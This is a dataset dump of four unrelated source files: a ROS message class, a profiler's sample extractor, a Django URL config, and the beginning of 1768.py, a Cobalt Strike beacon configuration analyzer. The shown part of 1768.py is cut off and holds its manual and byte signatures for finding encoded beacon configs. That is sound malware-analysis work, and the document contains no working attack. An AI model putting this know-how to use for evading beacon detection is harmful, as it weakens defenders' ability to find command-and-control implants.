916633a8a378f22eba66ea03cf4b89c43d1d1acb | 47d8ab3d656af1ca4dd2b82dc355df4b54745e67 | /install/lib/python2.7/dist-packages/game_engine/msg/_WallInfoArray.py | 1348924954000f23b3b752c8847a9f2aa1a45e29 | [] | no_license | sergiodmlteixeira/pitank_sim_ai | cbc4edbda53b6904dbfc3c462095cac608d52a52 | 06aa31de7a5a69a85f249a2310aa97f7205362ce | refs/heads/master | 2020-09-10T07:16:33.740922 | 2019-11-14T11:32:48 | 2019-11-14T11:32:48 | 221,682,160 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,023 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from game_engine/WallInfoArray.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import game_engine.msg
class WallInfoArray(genpy.Message):
_md5sum = "00bbbcfc52895902500308e3cbae4262"
_type = "game_engine/WallInfoArray"
_has_header = False #flag to mark the presence of a Header object
_full_text = """WallInfo[] wall
================================================================================
MSG: game_engine/WallInfo
int8 id
int8 cluster
int16 x1
int16 x2
int16 y1
int16 y2
float64 xc
float64 yc
int8 life
bool vertical
"""
__slots__ = ['wall']
_slot_types = ['game_engine/WallInfo[]']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
wall
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(WallInfoArray, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.wall is None:
self.wall = []
else:
self.wall = []
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
length = len(self.wall)
buff.write(_struct_I.pack(length))
for val1 in self.wall:
_x = val1
buff.write(_get_struct_2b4h2dbB().pack(_x.id, _x.cluster, _x.x1, _x.x2, _x.y1, _x.y2, _x.xc, _x.yc, _x.life, _x.vertical))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.wall is None:
self.wall = None
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.wall = []
for i in range(0, length):
val1 = game_engine.msg.WallInfo()
_x = val1
start = end
end += 28
(_x.id, _x.cluster, _x.x1, _x.x2, _x.y1, _x.y2, _x.xc, _x.yc, _x.life, _x.vertical,) = _get_struct_2b4h2dbB().unpack(str[start:end])
val1.vertical = bool(val1.vertical)
self.wall.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
length = len(self.wall)
buff.write(_struct_I.pack(length))
for val1 in self.wall:
_x = val1
buff.write(_get_struct_2b4h2dbB().pack(_x.id, _x.cluster, _x.x1, _x.x2, _x.y1, _x.y2, _x.xc, _x.yc, _x.life, _x.vertical))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.wall is None:
self.wall = None
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.wall = []
for i in range(0, length):
val1 = game_engine.msg.WallInfo()
_x = val1
start = end
end += 28
(_x.id, _x.cluster, _x.x1, _x.x2, _x.y1, _x.y2, _x.xc, _x.yc, _x.life, _x.vertical,) = _get_struct_2b4h2dbB().unpack(str[start:end])
val1.vertical = bool(val1.vertical)
self.wall.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_2b4h2dbB = None
def _get_struct_2b4h2dbB():
global _struct_2b4h2dbB
if _struct_2b4h2dbB is None:
_struct_2b4h2dbB = struct.Struct("<2b4h2dbB")
return _struct_2b4h2dbB
| [
"up201402940@fe.up.pt"
] | up201402940@fe.up.pt |
a0083b784729d64bac8af1aa1606136939c50a4c | 22f5453db8a5727bde81e98cb7b6dadf92ebed59 | /scripts/lib/xpedite/extractor.py | 259166be45f7b9d814e41b2483cb132570031da3 | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | kelliott55/Xpedite | 36f1493b7b2d6e53f3551f5bbbc3f6e2acdad5ff | 0be0ab07ec81164e0a8088a1cc3a0d60fa1fed06 | refs/heads/master | 2020-03-22T04:19:47.313380 | 2018-07-02T03:38:15 | 2018-07-02T03:38:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,423 | py | """
Extractor to extract and collect xpedite samples data
This module is used to load counter data from xpedite binary sample files.
A decoder is used to open and extract timing and pmc data captured by
probes in the target application.
Each such decoded record is inturn used to construct a Counter object for
transaction building.
Author: Manikandan Dhamodharan, Morgan Stanley
"""
import os
import re
import time
import logging
import subprocess
from xpedite.types import Counter, DataSource
from xpedite.util import makeLogPath, mkdir
LOGGER = logging.getLogger(__name__)
class Extractor(object):
"""Parses sample files to load counters for the current profile session"""
moduleDirPath = os.path.dirname(os.path.abspath(__file__))
samplesLoader = '{}/../../bin/xpediteSamplesLoader'.format(moduleDirPath)
def __init__(self, counterFilter, buildPrefix=None):
"""
Constructs a new instance of extractor
:param counterFilter: Filter to exclude out compromised or unused counters
:type counterFilter: xpedite.filter.TrivialCounterFilter
"""
self.binaryReportFilePattern = re.compile(r'[^\d]*(\d+)-(\d+)-([0-9a-fA-F]+)\.data')
self.counterFilter = counterFilter
self.buildPrefix = buildPrefix
self.orphanedRecords = []
def gatherCounters(self, app, loader, inflate=True):
"""
Gathers time and pmu counters from sample files for the current profile session
:param app: Handle to the instance of the xpedite app
:type app: xpedite.profiler.environment.XpediteApp
:param loader: Loader to build transactions out of the counters
:type loader: xpedite.transactionLoader.ChaoticTransactionLoader
:param inflate: Flag to persist profile data in csv format (Default value = True)
"""
pattern = app.sampleFilePattern()
LOGGER.info('scanning for samples files matching - %s', pattern)
filePaths = app.gatherFiles(pattern)
dataSourcePath = None
dataSources = []
if inflate:
dataSourcePath = makeLogPath('{}/{}'.format(app.name, app.runId))
dataSources.append(DataSource(app.appInfoPath, dataSourcePath))
loader.beginCollection(dataSources)
for filePath in filePaths:
(threadId, tlsAddr) = self.extractThreadInfo(filePath)
if not threadId or not tlsAddr:
raise Exception('failed to extract thread info for file {}'.format(filePath))
LOGGER.info('loading counters for thread %s from file %s -> ', threadId, filePath)
iterBegin = begin = time.time()
loader.beginLoad(threadId, tlsAddr)
inflateFd = self.openInflateFile(dataSourcePath, threadId, tlsAddr) if inflate else None
extractor = subprocess.Popen([self.samplesLoader, filePath],
bufsize=2*1024*1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
recordCount = 0
while True:
record = extractor.stdout.readline()
if record.strip() == '':
if extractor.poll() is not None:
errmsg = extractor.stderr.read()
if errmsg:
raise Exception('failed to load {} - {}'.format(filePath, errmsg))
break
if inflateFd:
inflateFd.write(record)
if recordCount > 0:
self.loadCounter(threadId, loader, app.probes, record)
elapsed = time.time() - iterBegin
if elapsed >= 5:
LOGGER.completed('\n\tprocessed %d counters | ', recordCount-1)
iterBegin = time.time()
recordCount += 1
loader.endLoad()
if inflateFd:
inflateFd.close()
elapsed = time.time() - begin
self.logCounterFilterReport()
if self.orphanedRecords:
LOGGER.warn('detected mismatch in binary vs app info - %d counters ignored', len(self.orphanedRecords))
LOGGER.completed('%d records | %d txns loaded in %0.2f sec.', recordCount-1, loader.getCount(), elapsed)
if loader.isCompromised() or loader.getTransactionCount() <= 0:
LOGGER.warn(loader.report())
elif loader.isNotAccounted():
LOGGER.debug(loader.report())
loader.endCollection()
MIN_FIELD_COUNT = 2
INDEX_TSC = 0
INDEX_ADDR = 1
INDEX_DATA = 2
INDEX_PMC = 3
def loadCounter(self, threadId, loader, probes, record):
"""
Loads time and pmu counters from the given record
:param threadId: Id of thread collecting the samples
:param loader: loader to build transactions out of the counters
:param probes: Map of probes instrumented in target application
:param record: A sample record in csv format
"""
fields = record.split(',')
if len(fields) < self.MIN_FIELD_COUNT:
raise Exception('detected record with < {} fields - \nrecord: "{}"\n'.format(self.MIN_FIELD_COUNT, record))
addr = fields[self.INDEX_ADDR]
if addr not in probes:
self.orphanedRecords.append(record)
return None
data = fields[self.INDEX_DATA]
tsc = long(fields[self.INDEX_TSC], 16)
counter = Counter(threadId, probes[addr], data, tsc)
if len(fields) > self.MIN_FIELD_COUNT:
for pmc in fields[self.MIN_FIELD_COUNT+1:]:
counter.addPmc(long(pmc))
if self.counterFilter.canLoad(counter):
loader.loadCounter(counter)
return counter
@staticmethod
def openInflateFile(dataSourcePath, threadId, tlsAddr):
"""
Creates a new data source file for the given thread
:param dataSourcePath: Path of the data source directory
:param threadId: Id of thread collecting the samples
:param tlsAddr: Address of thread local storage of thread collecting the samples
"""
path = os.path.join(dataSourcePath, '{}-{}'.format(threadId, tlsAddr))
mkdir(path)
filePath = os.path.join(path, 'samples-0000.csv')
return open(filePath, 'w')
def extractThreadInfo(self, samplesFile):
"""
Extracts thread id/thread local storage address from name of the samples file
:param samplesFile: Name of the samples file
"""
match = self.binaryReportFilePattern.findall(samplesFile)
if match and len(match[0]) > 2:
return (match[0][1], match[0][2])
return (None, None)
def logCounterFilterReport(self):
"""Logs statistics on the number of filtered counters"""
report = self.counterFilter.report()
if report:
if self.counterFilter.extraneousCounters > 0:
LOGGER.error(report)
else:
LOGGER.error(report)
self.counterFilter.reset()
| [
"Mani-D@users.noreply.github.com"
] | Mani-D@users.noreply.github.com |
450884b464f60b3e241efe035f78dab576018545 | 56aa30f949f9e66bce9b7351d72cf76a65e8cd33 | /config/urls.py | 486d4479c5a6cb420fffdd8d1f3b3df2f07eba70 | [
"MIT"
] | permissive | bfssi-forest-dussault/food_list_db | 5684677aa9df6cd30fd81ae4a16940af34b32190 | 76d2d56a9948f41cf67f5a1c6612c2726bd0b8b7 | refs/heads/master | 2022-12-11T22:38:49.250432 | 2020-09-10T20:17:10 | 2020-09-10T20:17:10 | 294,507,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,886 | py | from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import include, path
from django.views import defaults as default_views
from django.views.generic import TemplateView
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
path("", TemplateView.as_view(template_name="pages/home.html"), name="home"),
path(
"about/", TemplateView.as_view(template_name="pages/about.html"), name="about"
),
# Django Admin, use {% url 'admin:index' %}
path(settings.ADMIN_URL, admin.site.urls),
# User management
path("users/", include("food_list_db.users.urls", namespace="users")),
path("accounts/", include("allauth.urls")),
# Your stuff: custom urls includes go here
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# API URLS
urlpatterns += [
# API base url
path("api/", include("config.api_router")),
# DRF auth token
path("auth-token/", obtain_auth_token),
]
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these url in browser to see how these error pages look like.
urlpatterns += [
path(
"400/",
default_views.bad_request,
kwargs={"exception": Exception("Bad Request!")},
),
path(
"403/",
default_views.permission_denied,
kwargs={"exception": Exception("Permission Denied")},
),
path(
"404/",
default_views.page_not_found,
kwargs={"exception": Exception("Page not Found")},
),
path("500/", default_views.server_error),
]
if "debug_toolbar" in settings.INSTALLED_APPS:
import debug_toolbar
urlpatterns = [path("__debug__/", include(debug_toolbar.urls))] + urlpatterns
| [
"forest.dussault@canada.ca"
] | forest.dussault@canada.ca |
c342af77f7076aebe55ba2cc939f06cccaabe9c9 | 137832600734c4a3a16966bbaba19d3540378f9a | /1768.py | d44ef2d1bd2a0adbdd61901b7614ced2cfa29e10 | [] | no_license | DidierStevens/DidierStevensSuite | e824354c80f5b7aae4dfb6e55f60178eb9ae208c | 8190354314d6f42c9ddc477a795029dc446176c5 | refs/heads/master | 2023-09-01T20:11:55.341694 | 2023-08-29T10:26:39 | 2023-08-29T10:26:39 | 35,275,445 | 1,670 | 554 | null | 2023-06-04T22:54:40 | 2015-05-08T11:21:00 | Python | UTF-8 | Python | false | false | 112,042 | py | #!/usr/bin/env python
from __future__ import print_function
__description__ = 'Analyze Cobalt Strike beacons'
__author__ = 'Didier Stevens'
__version__ = '0.0.19'
__date__ = '2023/04/27'
"""
Source code put in the public domain by Didier Stevens, no Copyright
https://DidierStevens.com
Use at your own risk
History:
2019/05/15: start
2019/05/18: continue
2019/05/25: continue
2019/12/06: continue
2019/12/07: continue
2019/12/17: continue
2020/02/03: 0.0.2 some changes for CS4: xor key is '.' in stead of 'i'
2020/10/11: 0.0.3 Python 3 fixes
2020/10/17: improve parsing
2020/10/18: updated some config identifiers: found https://github.com/JPCERTCC/aa-tools https://github.com/sysopfb/malware_decoders/tree/master/cs_beacon https://github.com/Sentinel-One/CobaltStrikeParser
2020/10/21: Python 3 fix in cBinaryFile
2020/10/28: refactoring
2020/10/29: man
2020/11/04: added xor chain decoding
2020/11/07: 0.0.4 updated shellcode analysis
2020/11/12: updated shellcode analysis
2020/11/16: added option -l
2020/11/17: continue
2020/11/29: added rule_shellcode_00_end
2021/02/13: 0.0.5 updated shellcode analysis (+ Python 3 fix); added XORChain analysis for PE sections; remove duplicate configs when dumping raw
2021/03/06: added option -c
2021/03/25: 0.0.6 fix for provided sample
2021/04/06: fix
2021/04/28: added option -J
2021/04/30: CS version guessing
2021/05/02: fix
2021/05/15: continue JSON output
2021/06/14: updated man with 1768.json info
2021/10/10: 0.0.8 1768.json improvements
2021/10/17: 0.0.9 added malleable instructions decoding
2021/11/01: refactoring instructions decoding
2021/11/05: 0.0.10 cOutput replacements
2021/11/07: added FinalTests
2021/11/14: added DNS fields
2021/11/17: added missing field names (ebook FINDING BEACONS IN THE DARK)
2021/12/12: 0.0.11 added 1768b.json support
2022/02/22: 0.0.12 added private key to 1768.json (provided by alexzorila); fix json output; pyzipper support
2022/04/15: 0.0.13 added option -H and IdentifyShellcode
2022/04/16: continue IdentifyShellcode
2022/05/20: 0.0.14 skipping 0x20 bytes
2022/07/31: 0.0.15 update class cAPIOptions
2022/08/17: added option --sanitycheck; refactored FinalTests
2022/08/20: 0.0.16 added output instructions to JSON output
2022/08/30: 0.0.17 added option -x
2023/04/02: updated man page
2023/04/03: 0.0.18 cleanup debugging
2023/04/27: 0.0.19 added LSFIF
Todo:
"""
import optparse
import sys
import os
import binascii
import random
import gzip
import collections
import glob
import textwrap
import re
import struct
import string
import math
import fnmatch
import json
import time
import hashlib
try:
import pyzipper as zipfile
except ImportError:
import zipfile
if sys.version_info[0] >= 3:
from io import BytesIO as DataIO
else:
from cStringIO import StringIO as DataIO
if sys.version_info[0] >= 3:
from io import StringIO
else:
from cStringIO import StringIO
try:
import pefile
import peutils
except ImportError:
print('Missing pefile and/or peutils Python module, please check if it is installed.')
sys.exit()
def PrintManual():
manual = r'''
Manual:
1768 Kelvin is the melting point of the metal cobalt.
This tool decrypts and dumps the configuration of Cobalt Strike Windows beacons (PE files), shellcode and memory dumps.
Use option -x to try all 256 xor keys for the configuration (not only 0x2e and 0x69).
Option -s (--select) can be used to select a particular configuration item (by decimal of hexadecimal number) for more information. For the moment, this option displays the complete item's data (hexadecimal in cleartext, encoded with 'i' (0x69) and encoded with '.' (0x2e). These hexadecimal values can be used to create detection rules, like YARA rules.
Option -l (--licenseid) is used to generate YARA rules to detect a beacon or shellcode with the given license ID. The id can be provided as an integer or an hexadecimal value (prefixed by 0x).
More than one license id can be provided: separate them by commas (,).
Each license id can be previded by a name for the license is (use : as a separator).
Example : 1768.py -l ATP_1:12345678,pentester_2:87654321
Option -c (--csv) is used to output the config parameters in CSV format.
Option -J (--jsonoutput) is used to output the config parameters in JSON format.
Use option -H to display the hashes of the analyzed file.
Option -S (--sanitycheck) performs a sanity check on the extracted configuration, and ignores the extracted configuration when it does not pass a sanity check.
The sanity check checks for the presence of config values 1 and 7, and check if their values are plausible:
1 -> known payload type
7 -> public key starts with 308
Option -V (--verbose) produces more output:
- verbosity for config values (like the private key for leaked keys)
- hex/ascii dump of found signatures
When a signature is found, the longest ASCII string in front of the signature (256 bytes span) is included, like this:
Sleep mask 64-bit 4.2 deobfuscation routine found: 0x122f12d31 (LSFIF: b'!#ALF:Y2V:Elastic/HKTL_CobaltStrike_Beacon_4_2_Decrypt')
LSFIF is abbreviation Longest String Found In Front.
A JSON file with name 1768.json placed in the same directory as 1768.py will be used to enhance fields with information, like the license-id field.
It reads one or more files or stdin. This tool is very versatile when it comes to handling files, later full details will be provided.
This Python script was first developed with Python 2.7 and tested with Python 2.7 and 3.7, now it is developed with Python 3.9 and tested with Python 3.9.
As stated at the beginning of this manual, this tool is very versatile when it comes to handling files. This will be explained now.
This tool reads files in binary mode. It can read files from disk, from standard input (stdin) and from "generated" files via the command line.
It can also partially read files (this is done with the cut operator).
If no file arguments are provided to this tool, it will read data from standard input (stdin). This way, this tool can be used in a piped chain of commands, like this:
oledump.py -s 4 -d sample.doc.vir | tool.py
When one or more file arguments are provided to this tool, it will read the files and process the content.
How the files are read, depends on the type of file arguments that are provided. File arguments that start with character @ or # have special meaning, and will be explained later.
If a file argument does not start with @ or #, it is considered to be a file on disk and the content will be read from disk.
If the file is not a compressed file, the binary content of the file is read from disk for processing.
Compressed files are solely recognized based on their extension: .zip and .gz.
It uses built-in Python module zipfile, unless module pyzipper is installed. Module pyzipper adds AES support, and can be installed with pip (Python 3 only).
If a file argument with extension .gz is provided, the tool will decompress the gzip file in memory and process the decompressed content. No checks are made to ensure that the file with extension .gz is an actual gzip compressed file.
If a file argument with extension .zip is provided and it contains a single file, the tool will extract the file from the ZIP file in memory and process the decompressed content. No checks are made to ensure that the file with extension .zip is an actual ZIP compressed file.
Password protected ZIP files can be processed too. The tool uses password 'infected' (without quotes) as default password. A different password can be provided using option --password.
Example:
tool.py sample.zip
To prevent the tool from decompressing .zip or .gz files, but to process the compressed file itself, use option --noextraction.
File arguments that start with character @ ("here files"), are read as text files that contain file arguments (one per line) to be processed.
For example, we take a text file with filename list.txt and following content:
sample-1.bin
sample-5.bin
sample-7.bin
When using this file (list.txt) in the following command:
tool.py @list.txt
the tool will process the following files: sample-1.bin, sample-5.bin and sample-7.bin.
A single @ character as filename is a here file read from stdin.
Wildcards are supported too. The classic *, ? and [] wildcard characters are supported. For example, use the following command to process all .exe and .dll files in the Windows directory:
tool.py C:\Windows\*.exe C:\Windows\*.dll
To prevent the tool from processing file arguments with wildcard characters or special initial characters (@ and #) differently, but to process them as normal files, use option --literalfilenames.
The content of folders can be processed too: use option --recursedir and provide folder names as argument. Wildcards and here files (for folder names) can be used too.
File arguments that start with character # have special meaning. These are not processed as actual files on disk (except when option --literalfilenames is used), but as file arguments that specify how to "generate" the file content.
File arguments that start with #, #h#, #b# or #e# are used to "generate" the file content.
Arguments that start with #c# are not file arguments, but cut operators (explained later).
Arguments that start with #f# are not file arguments, but flags (explained later).
Generating the file content with a # file argument means that the file content is not read from disk, but generated in memory based on the characteristics provided via the file argument.
When a file argument starts with # (and not with #h#, #b#, #e# or #c#), all characters that follow the # character specify the content of the generated file.
For example, file argument #ABCDE specifies a file containing exactly 5 bytes: ASCII characters A, B, C, D and E.
Thus the following command:
tool.py #ABCDE
will make the tool process data with binary content ABCDE. #ABCDE is not an actual file written on disk, but it is a notational convention to provide data via the command line.
Since this notation can not be used to specify all possible byte values, hexadecimal encoding (#h#) and BASE64 encoding (#b#) notation is supported too.
For example, #h#4142434445 is an hexadecimal notation that generates data ABCDE. Hexadecimal notation allows the generation of non-printable characters for example, like NULL bytes: #h#00
File argument #b#QUJDREU= is another example, this time BASE64 notation, that generates data ABCDE.
File arguments that start with #e# are a notational convention to use expressions to generate data. An expression is a single function/string or the concatenation of several functions/strings (using character + as concatenation operator).
Strings can be characters enclosed by single quotes ('example') or hexadecimal strings prefixed by 0x (0xBEEF).
4 functions are available: random, loremipsum, repeat and chr.
Function random takes exactly one argument: an integer (with value 1 or more). Integers can be specified using decimal notation or hexadecimal notation (prefix 0x).
The random function generates a sequence of bytes with a random value (between 0 and 255), the argument specifies how many bytes need to be generated. Remark that the random number generator that is used is just the Python random number generator, not a cryptographic random number generator.
Example:
tool.py #e#random(100)
will make the tool process data consisting of a sequence of 100 random bytes.
Function loremipsum takes exactly one argument: an integer (with value 1 or more).
The loremipsum function generates "lorem ipsum" text (fake latin), the argument specifies the number of sentences to generate.
Example: #e#loremipsum(2) generates this text:
Ipsum commodo proin pulvinar hac vel nunc dignissim neque eget odio erat magna lorem urna cursus fusce facilisis porttitor congue eleifend taciti. Turpis duis suscipit facilisi tristique dictum praesent natoque sem mi egestas venenatis per dui sit sodales est condimentum habitasse ipsum phasellus non bibendum hendrerit.
Function chr takes one argument or two arguments.
chr with one argument takes an integer between 0 and 255, and generates a single byte with the value specified by the integer.
chr with two arguments takes two integers between 0 and 255, and generates a byte sequence with the values specified by the integers.
For example #e#chr(0x41,0x45) generates data ABCDE.
Function repeat takes two arguments: an integer (with value 1 or more) and a byte sequence. This byte sequence can be a quoted string of characters (single quotes), like 'ABCDE' or an hexadecimal string prefixed with 0x, like 0x4142434445.
The repeat function will create a sequence of bytes consisting of the provided byte sequence (the second argument) repeated as many times as specified by the first argument.
For example, #e#repeat(3, 'AB') generates byte sequence ABABAB.
When more than one function needs to be used, the byte sequences generated by the functions can be concatenated with the + operator.
For example, #e#repeat(10,0xFF)+random(100) will generate a byte sequence of 10 FF bytes followed by 100 random bytes.
The cut argument (or cut operator) allows for the partial selection of the content of a file. This argument starts with #c# followed by a "cut-expression". Use this expression to "cut out" part of the content.
The cut-argument must be put in front of a file argument, like in this example:
tool.py #c#0:100l data.bin
With these arguments, tool.py will only process the first 100 bytes (0:100l) of file data.bin.
A cut argument is applied to all file arguments that follow it. Example:
tool.py #c#0:100l data-1.bin data-2.bin
With these arguments, tool.py will only process the first 100 bytes (0:100l) of file data-1.bin and the first 100 bytes file data-2.bin.
More than one cut argument can be used, like in this example:
tool.py #c#0:100l data-1.bin #c#0:200l data-2.bin
With these arguments, tool.py will only process the first 100 bytes (0:100l) of file data-1.bin and the first 200 bytes (0:200l) of file data-2.bin.
A cut-expression is composed of 2 terms separated by a colon (:), like this:
termA:termB
termA and termB can be:
- nothing (an empty string)
- a positive decimal number; example: 10
- an hexadecimal number (to be preceded by 0x); example: 0x10
- a case sensitive ASCII string to search for (surrounded by square brackets and single quotes); example: ['MZ']
- a case sensitive UNICODE string to search for (surrounded by square brackets and single quotes prefixed with u); example: [u'User']
- an hexadecimal string to search for (surrounded by square brackets); example: [d0cf11e0]
If termA is nothing, then the cut section of bytes starts with the byte at position 0.
If termA is a number, then the cut section of bytes starts with the byte at the position given by the number (first byte has index 0).
If termA is a string to search for, then the cut section of bytes starts with the byte at the position where the string is first found. If the string is not found, the cut is empty (0 bytes).
If termB is nothing, then the cut section of bytes ends with the last byte.
If termB is a number, then the cut section of bytes ends with the byte at the position given by the number (first byte has index 0).
When termB is a number, it can have suffix letter l. This indicates that the number is a length (number of bytes), and not a position.
termB can also be a negative number (decimal or hexademical): in that case the position is counted from the end of the file. For example, :-5 selects the complete file except the last 5 bytes.
If termB is a string to search for, then the cut section of bytes ends with the last byte at the position where the string is first found. If the string is not found, the cut is empty (0 bytes).
No checks are made to assure that the position specified by termA is lower than the position specified by termB. This is left up to the user.
Search string expressions (ASCII, UNICODE and hexadecimal) can be followed by an instance (a number equal to 1 or greater) to indicate which instance needs to be taken. For example, ['ABC']2 will search for the second instance of string 'ABC'. If this instance is not found, then nothing is selected.
Search string expressions (ASCII, UNICODE and hexadecimal) can be followed by an offset (+ or - a number) to add (or substract) an offset to the found instance. This number can be a decimal or hexadecimal (prefix 0x) value. For example, ['ABC']+3 will search for the first instance of string 'ABC' and then select the bytes after ABC (+ 3).
Finally, search string expressions (ASCII, UNICODE and hexadecimal) can be followed by an instance and an offset.
Examples:
This cut-expression can be used to dump the first 256 bytes of a PE file located inside the file content: ['MZ']:0x100l
This cut-expression can be used to dump the OLE file located inside the file content: [d0cf11e0]:
A flag argument starts with #f# and is passed on for all files that are provided after the flag argument. It can be used to change the behavior of the tool for certain files.
Example:
tool.py data-1.bin #f#-l data-2.bin
data-2.bin will be processed differently (using flag option -l) than file data-1.bin.
With option --jsoninput, the tool will parse the output produced by another tool using option --jsonoutput.
Example:
zipdump.py --jsonoutput Book1.xlsm | file-magic.py --jsoninput
[Content_Types].xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
_rels/.rels XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/_rels/workbook.xml.rels XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/workbook.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/drawings/drawing1.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/worksheets/_rels/sheet1.xml.rels XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/theme/theme1.xml XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
xl/styles.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/worksheets/sheet1.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/vbaProject.bin Composite Document File V2 Document, Cannot read section info
xl/drawings/vmlDrawing1.vml ASCII text, with CRLF line terminators
docProps/app.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/ctrlProps/ctrlProp1.xml XML 1.0 document, ASCII text, with CRLF line terminators
docProps/core.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
In this example, zipdump is used to produce JSON data with the content of each file contained inside file Book1.xlsm (a ZIP container), which is then consumed by file-magic.py to identify (libmagic) the type of each file.
With option --ignoreprocessingerrors, the tool will continue processing the next file when an error occurs while processing the current file. Files that can not be opened will always be skipped to move to the next file.
Option --logfile direct the tool to create a logfile, and option --logcomment can be used to add a comment to the log file. The log file will contain metadata and a list of processed files, it does not contain processing results.
It is best to use this option when option --ignoreprocessingerrors is used, to have a record of file processing errors.
The lines are written to standard output, except when option -o is used. When option -o is used, the lines are written to the filename specified by option -o.
Filenames used with option -o starting with # have special meaning.
#c#example.txt will write output both to the console (stdout) and file example.txt.
#g# will write output to a file with a filename generated by the tool like this: toolname-date-time.txt.
#g#KEYWORD will write output to a file with a filename generated by the tool like this: toolname-KEYWORD-date-time.txt.
Use #p#filename to display execution progress.
To process several files while creating seperate output files for each input file, use -o #s#%f%.result *.
This will create output files with the name of the inputfile and extension .result.
There are several variables available when creating separate output files:
%f% is the full filename (with directory if present)
%b% is the base name: the filename without directory
%d% is the directory
%r% is the root: the filename without extension
%ru% is the root made unique by appending a counter (if necessary)
%e% is the extension
#h# is like the head command: only the first 10 lines will be outputed.
#t# is like the tail command: only the last 10 lines will be outputed.
Most options can be combined, like #ps# for example.
#l# is used for literal filenames: if the output filename has to start with # (#example.txt for example), use filename #l##example.txt for example.
'''
for line in manual.split('\n'):
print(textwrap.fill(line, 79))
DEFAULT_SEPARATOR = ','
QUOTE = '"'
START_CONFIG = b'\x00\x01\x00\x01\x00\x02'
START_CONFIG_I = b'ihihik'
START_CONFIG_DOT = b'././.,'
ERROR_NO_CONFIG = 'Error: config not found'
ERROR_SANITY_CHECK = 'Error: config does not pass sanity check'
def PrintError(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
#Convert 2 Bytes If Python 3
def C2BIP3(string):
if sys.version_info[0] > 2:
return bytes([ord(x) for x in string])
else:
return string
#Convert 2 String If Python 3
def C2SIP3(bytes):
if sys.version_info[0] > 2:
return ''.join([chr(byte) for byte in bytes])
else:
return bytes
#Convert 2 Integer If Python 2
def C2IIP2(data):
if sys.version_info[0] > 2:
return data
else:
return ord(data)
def P23Ord(value):
if type(value) == int:
return value
else:
return ord(value)
# CIC: Call If Callable
def CIC(expression):
if callable(expression):
return expression()
else:
return expression
# IFF: IF Function
def IFF(expression, valueTrue, valueFalse):
if expression:
return CIC(valueTrue)
else:
return CIC(valueFalse)
#-BEGINCODE cBinaryFile------------------------------------------------------------------------------
#import random
#import binascii
#import zipfile
#import gzip
#import sys
#if sys.version_info[0] >= 3:
# from io import BytesIO as DataIO
#else:
# from cStringIO import StringIO as DataIO
def LoremIpsumSentence(minimum, maximum):
